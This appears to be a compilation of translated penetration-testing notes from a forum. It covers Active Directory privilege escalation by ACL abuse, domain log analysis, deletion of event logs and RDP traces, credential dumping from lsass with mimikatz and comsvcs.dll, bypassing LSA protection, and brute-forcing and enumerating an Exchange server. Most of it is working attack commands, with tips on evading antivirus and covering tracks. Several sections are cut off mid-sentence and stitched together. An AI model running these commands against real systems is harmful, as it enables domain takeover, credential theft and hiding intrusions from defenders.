you can also consider the attack methods on user accounts above; or use Shadow Credentials to attack; shadow credentials https://book.hacktricks.xyz/window-hardening/active-directory-methodology/acl-persistence-abuse/shadow-credentials https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab http://www.hackdig.com/02/hack-599160.htm https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html WriteProperty WriteProperty permissions to user groups Our controlled users have WriteProperty permissions to the domain admins group. This user can be added to the domain admins group to increase permissions. powershell -exec bypass Import-Module .\PowerView.ps1 Add-NetGroupUser -UserName user -GroupName 'domain admins' -Domain 'vvvv1.com' Self (Self-Membership) Self (Self-Membership) permissions to user groups Our controlled users have Self (Self-Membership) permissions to the domain admins group. This permission can also add the user to the group permission, and add the user to the domain admins group to increase permissions. powershell -exec bypass Import-Module .\PowerView.ps1 Add-NetGroupUser -UserName user -GroupName 'domain admins' -Domain 'vvvv1.com' 'WriteProperty (Self-Membership)' and 'Self (Self-Membership)' are both attributes related to self-membership, but they differ in meaning. 'WriteProperty (Self-Membership)': This property indicates that the object can write (modify) its own properties. Generally speaking, an object can only modify the properties of other objects, but cannot directly modify its own properties. But when the 'WriteProperty (Self-Membership)' property is set, the object can modify its own properties. 'Self (Self-Membership)': This property indicates that the object itself is a member of the group or collection it is located in. It is different from the 'WriteProperty (Self-Membership)' property. The 'Self (Self-Membership)' property indicates that the object itself is a member of its group or collection, while the 'WriteProperty (Self-Membership)' property indicates that the object has permission to modify its own properties. Summary: That is to say, if the object type is not ALL, but Self-Membership, then it means that the user object we are querying belongs to this user group. The 'WriteProperty (Self-Membership)' attribute gives the object permission to modify its own attributes, so that the object can be added to the group; and the 'Self (Self-Membership)' attribute indicates that the object itself is a member of the group or collection it is located, and the object can also be added to the group. WriteProperty (Self-Membership) WriteProperty (Self-Membership) permissions to user groups Our controlled users have WriteProperty (Self-Membership) permissions to the domain admins group. Get-ObjectAcl -ResolveGUIDs | ? {$_.objectdn -eq 'CN=Domain Admins,CN=Users,DC=offense,DC=local' -and $_.IdentityReference -eq 'OFFENSE\spotless'} This permission can also add the user to the group permission, and add the user to the domain admins group to increase permissions. net group 'domain admins' spotless /add /domain 'WriteProperty (Self-Membership)' and 'Self (Self-Membership)' are both attributes related to self-membership, but they differ in meaning. 'WriteProperty (Self-Membership)': This property indicates that the object can write (modify) its own properties. Generally speaking, an object can only modify the properties of other objects, but cannot directly modify its own properties. But when the 'WriteProperty (Self-Membership)' property is set, the object can modify its own properties. 'Self (Self-Membership)': This property indicates that the object itself is a member of the group or collection it is located in. It is different from the 'WriteProperty (Self-Membership)' property. The 'Self (Self-Membership)' property indicates that the object itself is a member of its group or collection, while the 'WriteProperty (Self-Membership)' property indicates that the object has permission to modify its own properties. Summary: That is to say, if the object type is not ALL, but Self-Membership, then it means that the user object we are querying belongs to this user group. The 'WriteProperty (Self-Membership)' attribute gives the object permission to modify its own attributes, so that the object can be added to the group; and the 'Self (Self-Membership)' attribute indicates that the object itself is a member of the group or collection it is located, and the object can also be added to the group. ForceChangePassword ForceChangePassword permissions to user accounts If our controlled account is of the 'User-Force-Change-Password' object type in the ACL of the target account and has the 'ExtendedRight' permission, then we can reset the user's password without knowing the user's current password. powershell -exec bypass Import-Module .\PowerView.ps1 Get-ObjectAcl -SamAccountName delegate -ResolveGUIDs | ? {$_.IdentityReference -eq 'OFFENSE\spotless'} Use the tool PowerView to modify the password. Set-DomainUserPassword -Identity delegate -Verbose Or use the following statement $c=Get-Credential Set-DomainUserPassword -Identity delegate -AccountPassword $c.Password -Verbose Or summarized into single line sentences Set-DomainUserPassword -Identity delegate -AccountPassword (ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose WriteOwner WriteOwner permissions to user groups Before the attack was carried out, the owner of Domain Admins was Domain Admins. After enumerating the ACEs of a certain group, if we find that a user under our control spotless has the 'WriteOwner' permission and that permission applies to 'ObjectType:All', then the owner of the group can be modified. Get-ObjectAcl -ResolveGUIDs | ? {$_.objectdn -eq 'CN=Domain Admins,CN=Users,DC=offense,DC=local' -and $_.IdentityReference -eq 'OFFENSE\spotless'} We can change the owner of the 'Domain Admins' object to our user, which in our case is 'spotless'. It should be noted that the SID specified with '-Identity' is the SID of the 'Domain Admins' group. Set-DomainObjectOwner -Identity S-1-5-21-2552734371-813931464-1050690807-512 -OwnerIdentity 'spotless' -Verbose //You can also use the name instad of the SID (HTB: Reel) Set-DomainObjectOwner -Identity 'Domain Admins' -OwnerIdentity 'spotless' GenericWrite GenericWrite is also identified in Access Mask. This permission can update the property value of the target object. You can use the Set-DomainObject method in PowerView to set the value of the target property. GenericWrite permissions to user accounts Get-ObjectAcl -ResolveGUIDs -SamAccountName delegate | ? {$_.IdentityReference -eq 'OFFENSE\spotless'} The controlled user spotless has the 'WriteProperty' permission to another user delegate, and this permission applies to the 'Script-Path' object type. It allows attackers to overwrite the delegate user's login script path, which means that the next time the delegate user logs in, their system will execute our malicious script. Set-ADObject -SamAccountName delegate -PropertyName scriptpath -PropertyValue '\\10.0.0.5\totallyLegitScript.ps1' You can see that the login script field of the delegate user is updated in AD. GenericWrite permissions to user groups Allows you to add new users (such as yourself) as members of the group. Similar to the 《GenericAll-对用户组的GenericAll权限》 operation above. https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse # Create creds $pwd=ConvertTo-SecureString 'JustAWeirdPwd!$' -AsPlainText -Force $creds=New-Object System.Management.Automation.PSCredential('DOMAIN\username', $pwd) # Add user to group Add-DomainGroupMember -Credential $creds -Identity 'Group Name' -Members 'username' -Verbose # Check user was

The logs in the domain generally end with .evtx, so we need to search the logs in the domain to use the dir command dir/s/b *.evtx /s: means recursive search, including subdirectories. /b: means that the results are displayed in concise mode, only the file path is displayed without other information. Here we can directly use the logparser tool to export log information in the domain. (In the domain control host) The logparser tool uses SQL query method for filtering. Use the following directives to filter out the login behavior of users in the domain through the strings column and eventid column. LogParser.exe -i:evt -o:csv 'SELECT RecordNumber,TimeWritten,EventID,Strings,Message into C:\log5.csv FROM Security where EventID='4624' and Strings LIKE '%|Kerberos|%|%.%.%.%|%' and Strings not LIKE '%|%$|%'' -i: input file type -o: output file type During normal domain penetration, we directly get the domain control and operate on the domain control host to export the logs. Generally, it is unrealistic to export the domain control logs or the logs of the specified member host for analysis: 1. VPN method; 2. Build a socks tunnel; 3. Use remote Trojan horses; Query logs through VPN Generally speaking, connect to the target host through VPN and enter the intranet environment for operation. Here we assume that the domain management account has been obtained and the export log analysis is performed through the domain management credentials. 1. Query the host's login record First obtain the log storage location of the domain control dir /s/b \\10.10.10.10\c$\security.evtx The domain control log file can be copied locally through the copy instruction. copy \\10.10.10.10\c$\Windows\System32\winevt\Logs\C:\Users\admins\Desktop\log Since the log file is a hidden file, we cannot export all .evtx files directly through logparser (cannot be searched) However, you can use logparser to remotely export partial logs LogParser.exe -i:EVT -o:CSV 'SELECT * INTO C:\1.csv FROM \\RemoteServer\Security' LogParser.exe -i:EVT -o:CSV 'SELECT * INTO C:\1.csv FROM \\10.10.10.10\Security' 2. Query the traces of logs during connection When we query log traces, we must first understand the authentication methods used for these logins: Windows uses NTML authentication by default, while Kerberos authentication is used in the domain network. Simply put, ntlm is a direct interactive authentication between the host and the host, and kerberos is authenticated by a third party (domain control). Domain control will only issue credentials to hosts and domain accounts within the domain. Therefore, when using IP for remote host positioning, ntlm authentication is used, and when using domain name or machine name for positioning, kerberos authentication is used. The process of connecting to remote sharing using net use is also a login process. Therefore, as long as there is a login, it will be reflected in the log. The same is true for logging in directly using dir and host. Log query analysis found that the host logs directly using kerberos authentication. When using dir and net use, if the remote host is ip, then it is ntlm authentication; on the contrary, if the domain name or machine name is used for positioning, then it is kerberos for positioning. Member host net use connection domain control host NTLM authentication packet net use \\10.10.10.10\ipc$ Through the instructions, we can know that the login of this instruction should be ntlm authentication. After multiple tests, it was found that if a member host uses the above statement to connect to the domain control host, the following records will be left on the domain control host. The first package is the credentials for verifying the account that connects to the domain control host. The second package is to assign permissions to the connection The third package is a data package with successful login In the third package, you can see the IP address, machine name and other information of the member host. S-1-0-0|-|-|0x0|S-1-5-21-3315874494-179465980-3412869843-1115|admins|VVVV1|0x889d1b|3|NtLmSsp|NTLM|WEB-2003|{000000000-0000-0000-00000-0000000000}|-|NTLM V1|128|0x0|-|10.10.10.3|1280|%%1833|-|-|%%1843|0x0|%%1842 Therefore, you only need to remotely export the third successfully logged-in data packet and modify the filtering rules to obtain the host information of the domain control in the log through net use. Use the logParser tool to export log files: C:\Users\admins\Desktop\LogParser.exe -i:EVT -o:CSV 'SELECT * INTO C:\Users\admins\Desktop\log\1.csv FROM\10.10.10.10\Security where strings like '%|NTLM|%|%.%.%.%|%'' Through the strings field, we can see the IP and host name of the host connected to the domain control. kerberos authentication packet net use \\ad-2016\ipc$ After multiple tests, it was found that if a member host is connected to the domain control host using the above statement, and using kerberos authentication will leave the following records on the domain control host. Therefore, you only need to remotely export the fifth successfully logged-in packet and modify the filtering rules to obtain the host information of the domain control in the log through net use. S-1-0-0|-|-|0x0|S-1-5-21-3315874494-179465980-3412869843-500|Administrator|VVVV1.COM|0x7c3dbeb9|3|Kerberos|Kerberos||{CE15C23A-E7E3-3FC1-4A75-FDF339BEC822}|-|-|0|0x0|-|10.10.10.12|50364|%%1840|-|-|-|%%1843|0x0|%%1842 Use the logParser tool to export log files: C:\Users\admins\Desktop\LogParser.exe -i:EVT -o:CSV 'SELECT * INTO C:\Users\admins\Desktop\log\1.csv FROM\10.10.10\Security where strings like '%|Kerberos|%|%.%.%.%|%' and strings not like '%|%$|%'' Through the strings field, we can see the IP and account of the host connected to the domain control. Member host dir connects to domain control host NTLM authentication packet dir \\10.10.10.10\c$ The principle is the same as net use, just use logparser to export it directly. C:\Users\admins\Desktop\LogParser.exe -i:EVT -o:CSV 'SELECT * INTO C:\Users\admins\Desktop\log\1.csv FROM\10.10.10.10\Security where strings like '%|NTLM|%|%.%.%.%|%'' kerberos authentication packet dir \\ad-2016\c$ The principle is the same as net use, just use logparser to export it directly. C:\Users\admins\Desktop\LogParser.exe -i:EVT -o:CSV 'SELECT * INTO C:\Users\admins\Desktop\log\1.csv FROM\10.10.10\Security where strings like '%|Kerberos|%|%.%.%.%|%' and strings not like '%|%$|%'' Member Host Connects Member Host dir \\10.10.10.10\c$ dir \\web-2003\c$ The first method, that is, the ntlm authentication method, is to only leave this log trace in the domain control host's log, which is almost useless, and the main trace is reflected in the log of the connected host. The second method, which is the kerberos authentication method, will leave two logs on the domain control host: request TGT and request ST log. The process of searching logs is also similar to the above, so I won't describe it here. Member host logs in by itself Only users who log in with the account of users in the domain will have traces left on the domain control host. If you log in with a local account, it will only be reflected in the log of the machine. If you use a user within the domain to log in, the domain control is to use kerberos for authentication, which is the same as the kerberos authentication packet above. Use the logParser tool to export log files: C:\Users\admins\Desktop\LogParser.exe -i:EVT -o:CSV 'SELECT * INTO C:\Users\admins\Desktop\log\1.csv FROM\10.10.10\Security where strings like '%|Kerberos|%|%.%.%.%|%' and strings not like '%|%$|%'' Query logs through socks proxy Generally speaking, when we take down a boundary host, we will build a socks tunnel and bring our local host agent into the intranet for operation. First, use hash delivery to ensure that the outside domain host has sufficient permissions. After testing, the hash passed operations will not generate log traces in the domain control and socks tunnel client hosts. 1. Query the host's login record The instructions and operations are the same as those of VPN. 2. Query the traces of logs during connection Remote host net use connection domain control host Because the Proxifier proxy tool cannot modify the dns proxy in the socks environment, resulting in the inability to correctly resolve the domain name and machine name. Therefore, you can only use IP operations, and use NTLM authentication. NTLM authentication packet net use \\10.10.10.10\ipc$ Through the instructions, we can know that the login of this instruction should be ntlm authentication. After multiple tests, it was found that if a member host uses the above statement to connect to the domain control host, the following records will be left on the domain control host. The first package is the credentials for verifying the account that connects to the domain control host. The second package is to assign permissions to the connection The third package is a data package with successful login In the third package, you can see the IP address, machine name and other information of the member host. S-1-0-0|-|-|0x0|S-1-5-21-3315874494-179465980-3412869843-1115|admins|VVVV1|0x889d1b|3|NtLmSsp|NTLM|WEB-2003|{000000000-0000-0000-00000-0000000000}|-|NTLM V1|128|0x0|-|10.10.10.3|1280|%%1833|-|-|%%1843|0x0|%%1842 Therefore, you only need to remotely export the third successfully logged-in data packet and modify the filtering rules to obtain the host information of the domain control in the log through net use. Use the logParser tool to export log files: C:\Users\admins\Desktop\LogParser.exe -i:EVT -o:CSV 'SELECT * INTO C:\Users\admins\Desktop\log\1.csv FROM\10.10.10.10\Security where strings like '%|NTLM|%|%.%.%.%|%'' Through the strings field, we can see the IP and host name of the host connected to the domain control. Remote dir connection to the domain control host NTLM authentication packet Because the Proxifier proxy tool cannot modify the dns proxy in the socks environment, resulting in the inability to correctly resolve the domain name and machine name. Therefore, you can only use IP operations, and use NTLM authentication. dir \\10.10.10.10\c$ The principle is the same as net use, just use logparser to export it directly. C:\Users\admins\Desktop\LogParser.exe -i:EVT -o:CSV 'SELECT * INTO C:\Users\admins\Desktop\log\1.csv FROM\10.10.10.10\Security where strings like '%|NTLM|%|%.%.%.%|%'' Remote host connects to member host dir \\10.10.10.10\c$ Both methods refer to leaving this log trace in the domain control host's log, which is almost useless, and the main trace is reflected in the log of the connected host. The process of searching logs is also similar to the above, so I won't describe it here. PowerShell Log Powershell logs are generally written directly to the system log However, in normal configuration, powershell does not save the command log of its execution, but only saves the powershell open command (ID:600) and powershell close command (ID:403) Therefore, during the penetration process, if we obtain an interactive shell, we can open the powershell first and then execute the command, then the log will only record the command to open the powershell, and will not save the record of the commands executed in the powershell terminal. However, if during the infiltration process, we get a webshell, that is, a semi-interactive command window, then we can only summarize the commands into one statement, and the command will be recorded in the log. PowerShell script usage When we use PowerShell script to execute commands, we need to execute a command first Powershell -ExecutionPolicy Bypass Used to bypass PowerShell execution policies. PowerShell enables execution policies by default, limiting script execution permissions. Execution policy is a security mechanism that controls whether script files are allowed to be executed and scripts from untrusted sources. By default, PowerShell's execution policy is set to 'Restricted' , which means that no script file is allowed to be executed. By using 'Powershell -ExecutionPolicy Bypass' in the PowerShell command line, execution policy restrictions can be bypassed and script files are allowed. This will temporarily change the execution policy to 'Bypass', allowing all scripts to be run. If the ps1 script we are about to import is SharpHound.ps1 Import-Module ./SharpHound.ps1 At this time, the SharpHound module has been loaded into the current session View all loaded modules in the current session Get-Module Get a list of all commands in the SharpHound module Get-Command -Module SharpHound Check out SharpHound usage help Get-Help SharpHound get-help Invoke-BloodHound -full Delete log If you are in a penetrating environment, deleting all logs will not only not cover up our traces, but will instead make our traces more obvious. Therefore, we can only use the method of deleting a single log, but Windows does not provide it, or it does not allow the operation of deleting a single log, so we can only use other methods. Tool usage: https://github.com/3gstudent/Eventlogedit-evtx--Evolution Principle of deleting single logs: https://3gstudent.github.io/Windows-XML-Event-Log-(EVTX)%E5%8D%95%E6%9D%A1%E6%97%A5%E5%BF%97%E6%B8%85%E9%99%A4-%E4%B8%80-%E5%88%A0%E9%99%A4%E6%80%9D%E8%B7%AF%E4%B8%8E%E5%AE%9E%E4%BE%8B https://github.com/QAX-A-Team/EventCleaner Clear RDP login traces https://blog.csdn.net/m0_37552052/article/details/82894963 https://blog.csdn.net/COCO56/article/details/102671007#:~:text=win10%E7%B3%BB%E7%BB%9F%E6%80%8E%E4%B9%88%E5%88%A0%E9%99%A4%E8%BF%9C%E7%A8%8B%E6%A1%8C%E9%9D%A2%E8%BF%9E%E6%8E%A5%E8%AE%B0%E5%BD%95%201%20%E6%8C%89win%2BR%E9%94%AE%E6%89%93%E5% BC%80%E8%BF%90%E8%A1%8C%EF%BC%8C%E8%BE%93%E5%85%A5%20regedit%201%20%E5%B9%B6%E7%A1%AE%E5%AE%9A%E3%80%82%202,%E5%9C%A8%E5%9C%B0%E5%9D%80%E6%A0%8F%E4%B8%AD%E8%BE%93%E5%85%A5%E4%BB%A5%E4%B8%8B%E5%9C%B0%E5%9D%80%E7%84%B6%E5%90%8E%E5%9B%9E%E8%BD%A6%E 5%8D%B3%E5%8F%AF%E8%BF%9B%E8%A1%8C%E7%9C%8B%E5%88%B0%E6%89%80%E6%9C%89%E7%9A%84%E5%B7%B2%E8%BF%9E%E6%8E%A5%E8%BF%87%E7%9A%84%E7%94%B5%E8%84%91%E3%80%82%20%E8%AE%A1%E7%AE%97%E6%9C%BA%5CHKEY_CURRENT_USER%5CSoftware%5CMicrosoft%5CTerminal%20Server% 20Client%5CDefault%201%203%20%E5%8F%B3%E9%94%AE%E7%82%B9%E5%87%BB%E9%9C%80%E8%A6%81%E7%AE%A1%E7%90%86%E7%9A%84%E8%AE%B0%E5%BD%95%E9%A1%B9%EF%BC%8C%E5%8F%AF%E4%BB%A5%E4%BF%AE%E6%94%B9%E6%88%96%E8%80%85%E5%88%A0%E9%99%A4%E6%AD%A4%E9%A1%B9%E3%80%82 https://blog.csdn.net/travelnight/article/details/122854895 Event ID: 1149: Record which source IPs were successfully logged into the local machine using RDP. Registration :HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers\ This path records which servers the current host has logged into. Event ID: 5156 Log: You can see when the machine has accessed port 3389 of other servers. 4624 —— Account logged in successfully 4625 —— Account cannot be logged in 1149 —— User authentication is successful Reprinted from the original link address: https://forum.butian.net/share/3657

Get the plaintext password of the current machine Before exporting the domain hash, we can first try to export the local hash password of the current machine. If the domain user logs in on this machine before, he can directly obtain the account of the domain user or even the domain administrator. On the Windows operating system, the sam database (C:\Windows\System32\config\sam) saves the hash of the local user. In the local authentication process, as the local security permission service process lsass.exe will also cache the user password in memory (dmp file). Therefore, here we can consider two ways to crawl the hash of the current machine: online tool extraction and offline analysis extraction. Note: In the system version after Windows 10\ 2012r2, the system user's plaintext password is disabled by default in the memory cache. At this time, you can use mimikatz to catch plaintext, and you will definitely not be able to catch it. Password field digits will be displayed directly as null. Here we manually modify the registry to save the plain text, so that we can crawl. (After modifying, you need to log out of the user before logging in) reg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest /v UseLogonCredential /t REG\_DWORD /d 1 /f mimikatz mimikatz is a powerful lightweight debugging tool developed by the Frenchman benjamin. It is intended for personal testing, but because of its powerful function, it can directly read the plaintext passwords of operating systems such as Windows XP-2012 and is famous for penetration testing. It can be said to be a necessary tool for penetration. Download address: https://github.com/gentilkiwi/mimikatz 1. Crawl hash through the registry Execute the command line to get the SAM and SYSTEM files of the current system registry (requires local administrator rights) reg save HKLM\\SYSTEM Sys.hiv reg save HKLM\\SAM Sam.hiv After obtaining the file, you can download it to the attacker's native machine and use mimikatz to analyze and extract hash offline. mimikatz.exe 'lsadump:sam /sam:Sam.hiv /system:Sys.hiv' 'exit' This method can only obtain the account of the local user saved in the SAM file 2. Upload mimikatz into the target machine and extract the account hash value saved by the local SAM file online privilege:debug token:elevate lsadump:sam 3. Extend the hash from the memory of lsass.exe mimikatz 'privilege:debug' 'sekurlsa:logonpasswords full' 'exit' It was found that the hash value of the domain administrator logged in to the local user was captured using the administrator permissions of the local user. pwdump7 Just run PwDump7.exe directly WEC Upload to the target machine and add parameters to run directly. -l List login session and NTLM credentials (default) -s Modify the NTLM credentials of the current login session Parameters: Username : Domainname :LM hash :NT hash -r Regularly list logged-in sessions and NTLM credentials. If a new session is found, it will be relisted every 5 seconds. -c Run a new session with a special NTML credentials Parameters: -e List login sessions and NTLM credentials from time to time, and relist them once when a login event is generated -o Save all outputs to a file Parameter : file name -i Specify a LUID instead of using the current login session Parameter : -d Delete NTLM credentials from login session Parameter : -a Use address Parameter : Address -f Force safe mode -g Generate hashings for LM and NT Parameter password -K cache kerberos tickets to a file (unix and windows wce formats) -k Read kerberos tickets from a file and insert them into windows cache -w cache a plaintext password through digest authentication -v Detailed output laZagne Download address: https://github.com/AlessandroZ/LaZagne LaZagne.exe all SharpDump https://github.com/GhostPack/SharpDump Just compile it directly ./Sharpdump LsassSilentProcessExit https://mp.weixin.qq.com/s/8uEr5dNaQs24KuKxu5Yi9w Silent Process Exit, that is, silently exit. This debugging technology can derive the werfault.exe process, which can be used to run any program or to relocate memory files or pop-ups of any process. Mainly use the LsassSilentProcessExit API, which dumps memory by modifying the registry + remote process injection, and the related registry key values: #define IFEO\_REG\_KEY 'SOFTWARE\\\\\\Microsoft\\\\\\Windows NT\\\\\CurrentVersion\\\\\Image File Execution Options\\\\\' #define SILENT\_PROCESS\_EXIT\_REG\_KEY 'SOFTWARE\\\\\\Microsoft\\\\\\Windows NT\\\\\CurrentVersion\\\\\\SilentProcessExit\\\\\' Use remote process injection to let lsass.exe call the RtlReportSilentProcessExit function itself: HMODULE hNtdll=GetModuleHandle(L'ntdll.dll'); RtlReportSilentProcessExit\_func RtlReportSilentProcessExit=(RtlReportSilentProcessExit\_func)GetProcAddress(hNtdll, 'RtlReportSilentProcessExit'); HANDLE hThread=CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD\_START\_ROUTINE)RtlReportSilentProcessExit, (LPVOID)-1, NULL, NULL); However, since the registry needs to be modified, it is almost impossible to bypass the soft-killing environment. LsassSilentProcessExit.exe 616 0 How to dump lsass processes in sensitive environments Use powershell to export without file https://blog.csdn.net/chenfeng857/article/details/120126818 https://xz.aliyun.com/t/12157#toc-9 comsvcs.dll, comes with the system. Implement dump memory through the export function MiniDump of comsvcs.dll. When dumping the specified process memory file, SeDebugPrivilege permission is required. Under the cmd of administrator permissions, SeDebugPrivilege permission is supported by default, but the status is Disabled disabled. If you directly execute the rundll32 command under cmd and try to dump the specified process memory file, the dump will fail because the SeDebugPrivilege permission cannot be enabled. However, under powershell with administrator privileges, SeDebugPrivilege permission is supported by default, and the status is enabled. First check the lsass.exe process PID tasklist | findstr lsass.exe rundll32.exe comsvcs.dll MiniDump PID Path full rundll32.exe comsvcs.dll MiniDump 1096 C:\\Users\\16229\\Desktop\\1.dmp full If you run it directly, you may be intercepted by Killing Soft. A simple way to bypass it: copycomsvcs.dll to insensitive directories and randomly named, for example test.dll copy C:\\windows\\System32\\comsvcs.dll test.dll rundll32.exe C:\\Users\\16229\\Desktop\\code\_java\\test.dll MiniDump 1096 C:\\Users\\16229\\Desktop\\code\_java\\3.dmp full Drag to locally and use mimikatz for analysis. mimikatz.exe log 'sekurlsa:minidump 2.dmp' 'sekurlsa:logonPasswords full' exit In the environment where runasppl is enabled https://www.freebuf.com/articles/system/332506.html https://xz.aliyun.com/t/12157#toc-19 mimikatz With PPL protection enabled, even administrators cannot open the lsass process. mimikatz 'privilege:debug' 'sekurlsa:logonpasswords full' 'exit' The command in Mimikatzprivilege:debug is successfully enabled; SeDebugPrivilege, but the command sekurlsa:logonpasswords failed and the error code0x00000005 appears. From the minikatz code kuhl_m_sekurlsa_acquireLSA() function, we can simply understand it as HANDLE hData=NULL; DWORD pid; DWORD processRights=PROCESS_VM_READ | PROCESS_QUERY_INFORMATION; kull_m_process_getProcessIdForName(L'lsass.exe', pid); hData=OpenProcess(processRights, FALSE, pid); if (hData hData !=INVALID_HANDLE_VALUE) { //if OpenProcess OK } else { PRINT_ERROR_AUTO(L'Handle on memory'); } Use process explorer to open the lsass process to view, and access is denied. Use digitally signed drivers in Mimikatz to remove protection flags for Process objects in kernel Minikatz install driver privilege:debug !+ Delete protection !processprotect /process:lsass.exe /remove Then you can dump the password sekurlsa:logonpasswords Use the tool to view the protection has been deleted mimikatz.exe 'privilege:debug' '!+' '!processprotect /process:lsass.exe /remove' 'sekurlsa:logonpasswords' 'exit' PPLKILLER https://www.cnblogs.com/revercc/p/16961961.html https://redcursor.com.au/bypassing-lsa-protection-aka-protected-process-light-without-mimikatz-on-windows-10/ Priority Difference: A PP can open a PP or PPL with full access permissions as long as its signature level is greater than or equal to; a PPL can open another PPL with full access permissions as long as its signature level is greater than or equal to; no matter the signature level, a PPL cannot open a PP with full access permissions. With PPL enabled, only processes running at a higher protection level can operate on protected processes. The Windows kernel uses the _EPROCESS structure to represent processes in kernel memory, which includes a _PS_PROTECTION field that defines the protection level of the process through its Type (_PS_PROTECTED_TYPE) and Signer (_PS_PROTECTED_SIGNER) properties. typedef struct _PS_PROTECTION { union { UCHAR Level; struct { UCHAR Type : 3; UCHAR Audit : 1; //Reserved UCHAR Signer : 4; }; }; } PS_PROTECTION, *PPS_PROTECTION; Although it is represented as a struct, all information is stored in two nibble of a single byte (Levelis a UCHAR, an unsigned char). The first 3 digits indicate the protection Type (see PS_PROTECTED_TYPE below). It defines whether the process is PP or PPL. The last 4 digits represent the Signer type (see PS_PROTECTED_SIGNER below), that is, the actual protection level. typedef enum _PS_PROTECTED_TYPE { PsProtectedTypeNone=0, PsProtectedTypeProtectedLight=1, PsProtectedTypeProtected=2 } PS_PROTECTED_TYPE, *PPS_PROTECTED_TYPE; typedef enum _PS_PROTECTED_SIGNER { PsProtectedSignerNone=0, //0 PsProtectedSignerAuthenticode, //1 PsProtectedSignerCodeGen, //2 PsProtectedSignerAntimalware, //3 PsProtectedSignerLsa, //4 PsProtectedSignerWindows, //5 PsProtectedSignerWinTcb, //6 PsProtectedSignerWinSystem, //7 PsProtectedSignerApp, //8 PsProtectedSignerMax //9 } PS_PROTECTED_SIGNER, *PPS_PROTECTED_SIGNER; If we want to bypass LSA protection, we can disable the PPL flag on the LSASS process by patching the EPROCESS kernel structure. To do this, we need to find the address of the LSASS EPROCESS structure and patch 5 values: SignatureLevel, SectionSignatureLevel, Type, Audit, and Signer to zero. The EnumDeviceDrivers function can be used to leak kernel base addresses. This can be used to locate the PsInitialSystemProcess, which points to the EPROCESS structure of the system process. Since the kernel stores processes in linked lists, it is possible to use ActiveProcessLinks members of the EPROCESS structure to iterate over the linked list and look for LSASS. Looking at the EPROCESS structure, we can see that the 5 fields we need to patch are aligned as conventionally 4 bytes. This allows us to patch the EPROCESS structure in a single 4-byte write as follows: WriteMemoryPrimitive(Device, 4, CurrentProcessAddress + SignatureLevelOffset,0x00); After finding the address, just patch the values of these four bytes to zero. PPLKiller.exe /installDriver tasklist | findstr lsass.exe PPLKiller.exe /disablePPL 688 If you encounter different kernel versions, the program cannot patch the four bytes correctly, you can find the same version of the machine and view the lsass kernel address through windbg debugging. bcdedit /debug onsrv\*https://msdl.microsoft.com/download/symbols .reload !process 0 0 lsass.exe dt \_eprocess Find address0x6c0, modify the script and then compile it. PPLdump https://itm4n.github.io/the-end-of-ppldump/ https://blog.scrt.ch/2021/04/22/bypassing-lsa-protection-in-userland/ PPLdump is a tool written in C/C++ that implements user-state vulnerability exploitation, injecting arbitrary code into PPL as an administrator. This technology is one of many findings by Alex Ionescu and James Forshaw to conduct in-depth research on protected processes (PP and PPL). The working principle of PPLdump is as follows: Call AP

During the penetration process, the Exchange mail server is usually the object we focus on. Because after taking down the Exchange mail server, with the permissions of its machine account, we can give other users in the domain dcsync permissions, and then export the hash in the domain and take down the entire domain. In the exchange system, configure powershell using the command https://learn.microsoft.com/zh-cn/powershell/module/exchange/add-mailboxfolderpermission?view=exchange-ps Scan Service setspn.exe setspn.exe -T vvvv1.com -F -Q */* | findstr exchange nmap nmap 192.168.52.139 -A Probe Versions and Vulnerabilities Obtain the precise version information of exchange through the ews interface Disadvantages: Some old exchange versions do not support this operation. Get rough version information of exchange through the Owa interface After obtaining the version number, you can go to the official website to check the corresponding Exchange version and release date. Query address: https://learn.microsoft.com/en-us/exchange/new-features/build-numbers-and-release-dates?view=exchserver-2016 Use scripts to detect versions and vulnerabilities https://github.com/3gstudent/Homework-of-Python/blob/master/Exchange_GetVersion_MatchVul.py Blasting python2 EBurst.py -d 192.168.52.139 -C You can also use this tool to blast user account passwords. python2 EBurst.py -d 192.168.52.139 -L ./users.txt -P ./passwords.txt --ews Information Collection Assuming that the credentials of one of the email users have been obtained, information can be collected next. Information collection through Autodiscover Through the https://Exchange/autodiscover/autodiscover.xml interface, you can accept xml requests and return the mailbox configuration to which the email specified in xml belongs. Because NTLMv2 authentication requires HTTP/1.1 connection, and the new version of burpsuit defaults to HTTP/2, we need to adjust it first. https://blog.csdn.net/qq_30786785/article/details/121742101 For operations such as reading configuration, please refer to the following link. https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E5%9F%BA%E7%A1%80-Exchange-Autodiscover%E7%9A%84%E4%BD%BF%E7%94%A8 Where basic is authentication, encrypted using base64 VVVV1\administrator:admin!@#456 POST /autodiscover/autodiscover.xml HTTP/1.1 Host: 192.168.52.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Authorization: Basic VlZWVjFcYWRtaW5pc3RyYXRvcjphZG1pbiFAIzQ1Ng== Content-Type: text/xml Content-Length: 350 Autodiscover xmlns='http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006' Request [email protected]/EMailAddress AcceptableResponseSchemahttp://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a/AcceptableResponseSchema /Request /Autodiscover If the email does not exist, it will return If the mailbox exists, the configuration information will be returned Get exchange address book The Global Address List (GAL) contains the email addresses of all email users in the Exchange organization. As long as you obtain the credentials of any email user in the Exchange organization, you can export the email addresses of other email users. You can use OWA, EWS, OAB, RPC over HTTP, MAPI over HTTP, etc. to obtain GAL. https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E8%8E%B7%E5%BE%97Exchange-GlobalAddressList%E7%9A%84%E6%96%B9%E6%B3%95 https://swarm.ptsecurity.com/attacking-ms-exchange-web-interfaces/ Use OWA to view directly Personnel-all users Get GAL through /EWS interface Powershell -ExecutionPolicy Bypass Import-Module .\MailSniper.ps1 Get-GlobalAddressList -ExchHostname 192.168.52.139 -UserName VVVV1\administrator -Password admin!@#456 -OutFile gal.txt Get GAL through OAB 1. OAB path collected through Autodiscover; 2. Access /OAB/OABURI/oab.xml; 